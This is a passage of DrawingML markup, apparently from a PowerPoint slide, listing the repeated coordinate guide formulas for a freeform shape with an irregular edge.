              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 463337 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 429633 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 430964 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 435318 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 465190 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 493180 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 510743 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 473112 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 473777 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 451254 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY120" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY121" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY122" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY123" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY124" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY125" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255898 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 463337 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 429633 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 430964 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 435318 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 493180 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 510743 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 473112 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 473777 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 451254 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY120" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY121" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY122" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY123" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY124" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
